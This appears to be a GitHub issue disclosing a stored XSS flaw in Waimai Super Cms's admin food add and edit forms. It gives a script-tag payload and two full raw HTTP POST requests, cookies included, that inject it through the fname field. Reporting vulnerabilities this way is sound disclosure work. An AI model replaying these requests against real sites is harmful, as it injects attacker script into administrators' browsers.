Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
xss Vulnerability in Waimai Super Cms In waimai Super Cms master, there is an XSS vulnerability via the /admin.php/Food/addsave and /admin.php/Food/editsave fname parameter.
Payload:<script>alert(20);</script>
Exploit URL / Algorithm:
#1 POST /xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=addsave HTTP/1.1 Host: xx.x.x.x:xxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.8.4.2:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=add Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------1708972804 Content-Length: 551
----------1708972804 Content-Disposition: form-data; name="fname"
sample<script>alert(2);</script> ----------1708972804 Content-Disposition: form-data; name="fcid"
19 ----------1708972804 Content-Disposition: form-data; name="pic"; filename="" Content-Type: application/octet-stream
----------1708972804 Content-Disposition: form-data; name="fprice"
1 ----------1708972804 Content-Disposition: form-data; name="fcontent"
sss ----------1708972804 Content-Disposition: form-data; name="fsort"
0 ----------1708972804--
#2
POST /sug/waimaicmsn/waimai-master/admin.php?m=Food&a=editsave HTTP/1.1 Host: 10.8.4.2:xxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=edit&id=90 Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------141470576471630910151028888 Content-Length: 912
-----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fname"
furf<script>alert(20);</script> -----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fid"
90 -----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fcid"
19 -----------------------------141470576471630910151028888 Content-Disposition: form-data; name="pic"; filename="" Content-Type: application/octet-stream
-----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fprice"
0.00 -----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fcontent"
dsdd -----------------------------141470576471630910151028888 Content-Disposition: form-data; name="fsort"
0 -----------------------------141470576471630910151028888--
The text was updated successfully, but these errors were encountered:
No branches or pull requests
xss Vulnerability in Waimai Super Cms
In waimai Super Cms master, there is an XSS vulnerability via the /admin.php/Food/addsave and /admin.php/Food/editsave fname parameter.
Payload:<script>alert(20);</script>
Exploit URL / Algorithm:
#1
POST /xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.8.4.2:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=add
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1708972804
Content-Length: 551
----------1708972804
Content-Disposition: form-data; name="fname"
sample<script>alert(2);</script>
----------1708972804
Content-Disposition: form-data; name="fcid"
19
----------1708972804
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
----------1708972804
Content-Disposition: form-data; name="fprice"
1
----------1708972804
Content-Disposition: form-data; name="fcontent"
sss
----------1708972804
Content-Disposition: form-data; name="fsort"
0
----------1708972804--
#2
POST /sug/waimaicmsn/waimai-master/admin.php?m=Food&a=editsave HTTP/1.1
Host: 10.8.4.2:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=edit&id=90
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------141470576471630910151028888
Content-Length: 912
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fname"
furf<script>alert(20);</script>
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fid"
90
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcid"
19
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fprice"
0.00
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcontent"
dsdd
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fsort"
0
-----------------------------141470576471630910151028888--
The text was updated successfully, but these errors were encountered: